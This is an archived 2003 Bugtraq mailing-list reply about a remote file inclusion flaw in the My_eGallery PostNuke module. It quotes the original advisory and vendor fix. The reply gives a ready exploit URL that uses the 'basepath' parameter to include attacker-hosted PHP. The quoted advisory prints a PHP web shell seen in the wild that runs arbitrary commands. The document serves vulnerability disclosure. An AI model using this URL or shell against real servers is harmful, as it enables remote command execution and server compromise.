lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <3FC936DF.7050608@runbox.com> Date: Sun, 30 Nov 2003 01:16:31 +0100 From: Fauvet Ludovic <etix@...box.com> To: bugtraq@...urityfocus.com Subject: Re: Remote execution in My_eGallery Hi, There is some php scrits which are vulnerables. One of these is displayCategory.php . So you just have to go to: http://www.[vulnerable].com/modules/My_eGallery/public/displayCategory.php?basepath=http://[youwebsite].com And create a directory "public" in the root of your website and put a file named imageFunctions.php with the code you want to inject. -- /*------------------- Best regards, [::eTiX::] (Fauvet Ludovic) -------------------*/ Bojan Zdrnja wrote: > Product: My_eGallery > Versions affected: all <3.1.1.g > Website: http://lottasophie.sourceforge.net/index.php > > 1. Introduction > --------------- > > My_eGallery is a very nice PostNuke module, which allows users to create and > manipulate their own galleries on the web, plus offers various additional > features. > For more information and a demonstration you can go to the Website above. > > 2. Exploit > ---------- > > Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this > vulnerability. > > Certain php files have some parameters which are used in include functions > not filtered. > An intruder can craft PHP code on their Web site and supply parameter to > My_eGallery so it actually includes malicious PHP code. > > The following code was captured as being used in the wild (edited > intentionally): > > <? > // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) > if (isset($chdir)) @chdir($chdir); > ob_start(); > execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); > $output = ob_get_contents(); > ob_end_clean(); > print_output(); > ?> > > This allows execution of any command on the server with My_eGallery, under > the privileges of the Web server (usually apache or httpd). > > > 3. Solution > ----------- > > Vendor was contacted and promptly replied. Fix is available at the vendor's > site: > > http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil > e=index&req=viewdownload&cid=5 > > As this was seen being exploited in the wild, users are urged to upgrade to > the latest version as soon as possible. > > > > > Regards, > > Bojan Zdrnja > CISSP > > -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.2.1 mQGiBD744NQRBACSpcLYHKjo3PCDHVuJZFkzNkK9gzjCNXQnzIwpPwEI5xJd5VuX g3+gNw0VfYx/qtIXhKW0lGAulEearMpc3SzxTB7vbz8DNU/xquxJPl4yovroJVQz fE+r9O836yF2SvD8SgiCZfT1uBDNhU2C7z72epc5jsSYDqBMyjm/DS8t7wCg3zgF NbwEYkx65RNBw4wpGV+o42kD/itttOB/P0Qy8/TLo8RL591PjovuCXsuy11ojS3W Prewtx9hLO1lheqtrM+xh1fZ9P2c99KBbqVYAHLYjG/rIJGGap9TvisXYnZw2xYg XQUpv1IB3TyUjKykTwD1L9lTl40Gy32NQLVmf4QEowXJxANVQcybe6GjoMifoY4U bYZgA/45OW7lL6ufLVREo3WMWIxCqwPDWmyTvAk4vPKexhcSvTgBrjaUFKn8Jk0A W0IyEM9JjTckgGVOoP5tubhEk2xVzc7dZ0D9oJvmHj92dp0Sbb+HG1uD4v2VmWWM OoZTDvbk52LJHqfTlXZpalbmFBPg63KzIANgADdicrxxRTLE9LQtRmF1dmV0IEx1 ZG92aWMgKFs6OmVUaVg6Ol0pIDxldGl4QHJ1bmJveC5jb20+iFkEExECABkFAj74 4NQECwcDAgMVAgMDFgIBAh4BAheAAAoJEM+k/AIs6moUaN4AoKrMa/7z7ioFoMM+ ZCN7XGF5pZgpAJ9P0s2pjF2yajoQhT+PPf1WkKmY07kBzQQ++ODZEAcAvAG8v2P8 rWZAs3nFpCJxxYLyEd/HzanEhZ0o2uOQbwrQO3lfJRKwvjhkiZ4Th3bEILEShvhe gVR4Q2KhSD/c7NUmADI945OMCwWajgPF+/voYKuChLt0gFiOYiT5aK9ElhU9BjTe guAyMvAsxxski8ntJn+FX7KTjmwqfyRdJtvvxPh5bqqctJqkgVEeGfBPAL0aCjBh ucZB2j8Ecadzy9SNIvYrF7S1QpBFk7+8dIz15gqd00YPJa5eoUzI/AO1FIKigZdt mg60PLMNvU5q+TmKFhibE8ZjGOjzErlRM+8AAwUHAKuTuFGLzggST4hvDnI88yLY q4GUvH+DlAtmhhElOz9HBgNl1sppLqzqnHhcMAaiHKYBU/OV4tNI+FlhfbV8ZQEx EWKTtxO0sLX3zXWxghkmfxglZggejb8R5pwvP0EzBuKpthAEAHRbWdZxkrqUDw8q IuPetoeHOCeFMYLeneZZPnPfGALSxfg3ivQMf5tn3LAvP+80dOOVdB0k5GWdWv/4 yBj+mUnhdLuRbtL2mate/jPLB8JGhklk4nntXkf9DvUUhqEYrEx1o1jYyRYFUkVy bMiS0y3S26O/pgDz88GRiEYEGBECAAYFAj744NkACgkQz6T8AizqahQYXACgjPiE /GBKDhTcWf1F1A+4aVIazksAoKTa1m181gR8wHDa84VbRQ5aCShe =Sid/ -----END PGP PUBLIC KEY BLOCK-----
Powered by blists - more mailing lists